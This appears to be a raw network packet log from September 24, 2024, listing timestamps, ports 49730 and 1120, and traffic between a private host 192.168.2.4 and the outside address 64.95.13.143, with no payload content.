Sep 24, 2024 17:46:11.573158026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.573158026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.573712111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573719025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573729992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573735952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573741913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573753119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573757887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573767900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573774099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573780060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573781013 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.573798895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.573824883 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.574338913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.574347019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.574357986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.574363947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.574369907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.574382067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.574387074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.574400902 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.574404001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.574412107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.574426889 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.574449062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.575301886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575309038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575320005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575325966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575336933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575342894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575347900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575355053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575356960 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.575360060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575375080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.575393915 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.575419903 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.576117992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.576124907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.576136112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.576175928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.576188087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.576194048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.576204062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.576209068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.576220989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.576224089 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.576292992 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.577076912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.577084064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.577094078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.577099085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.577110052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.577137947 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.577168941 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.633654118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.633675098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.633687019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.633788109 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.633985996 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.633992910 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.634002924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.634008884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.634013891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.634042978 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.634071112 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.660485029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.660518885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.660527945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.660533905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.660649061 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.660788059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.660800934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.660829067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.660835981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.660849094 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.660886049 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.662034035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662043095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662055016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662106037 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.662235975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662292004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662298918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662302971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.662343025 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.662720919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662727118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662739992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662784100 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.662915945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662921906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662934065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.662975073 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.663146019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663152933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663162947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663168907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663175106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663184881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663191080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663204908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.663230896 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.663897991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663907051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663918972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663924932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.663964987 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.664278030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664283991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664290905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664324999 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.664351940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.664716005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664722919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664757967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664762974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664772987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664778948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664788008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664794922 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.664805889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.664848089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.664874077 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.665597916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665605068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665615082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665621042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665632010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665637016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665647984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665652990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665657997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665659904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.665668964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.665693045 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.665720940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.666657925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.666666985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.666672945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.666678905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.666683912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.666691065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.666702032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.666707993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.666712999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.666721106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.666754007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.667457104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.667464972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.667476892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.667483091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.667488098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.667493105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.667499065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.667504072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.667515993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.667531013 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.667557955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.668287039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668293953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668304920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668312073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668317080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668323040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668327093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668333054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668338060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668343067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668353081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668358088 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.668370008 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.668416023 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.669234037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669243097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669254065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669260025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669265032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669275999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669281960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669286966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669291973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669296980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669297934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.669303894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669310093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669315100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.669318914 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.669338942 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.669359922 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.670275927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670284986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670289993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670295954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670301914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670314074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670320034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670330048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670330048 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.670336962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670344114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670348883 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.670348883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670356035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.670367002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.670396090 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.671051025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.671060085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.671108007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.726541996 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.726587057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.726593018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.726598978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.726603985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.726609945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.726624012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.726694107 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.726746082 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.753438950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.753452063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.753463030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.753530025 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.753703117 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.753709078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.753720045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.753731012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.753760099 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.753777981 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.755091906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755099058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755110979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755156040 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.755309105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755315065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755327940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755333900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755361080 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.755620003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755626917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755676031 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.755691051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755697012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755707979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755713940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755719900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.755740881 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.755764961 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.756277084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756285906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756299019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756304979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756310940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756323099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756330013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756334066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.756351948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.756372929 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.756890059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756896973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756907940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756915092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756921053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756932020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756937981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756942987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.756951094 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.756968975 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.756989002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.757570028 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757582903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757594109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757600069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757606030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757611036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757622957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757627964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757632017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.757632971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757638931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.757652998 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.757677078 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.758445978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758452892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758465052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758471012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758476973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758490086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758495092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758501053 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.758506060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758518934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.758518934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758527994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.758538961 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.758572102 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.759392977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759401083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759406090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759412050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759422064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759428024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759439945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759444952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759449959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759454012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.759491920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.759491920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.760296106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760303020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760333061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760338068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760343075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760348082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760360956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760365963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760373116 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.760376930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760384083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760385990 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.760390043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.760416031 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.760436058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.761212111 CEST	1120	49730	64.95.13.143	192.168.2.4
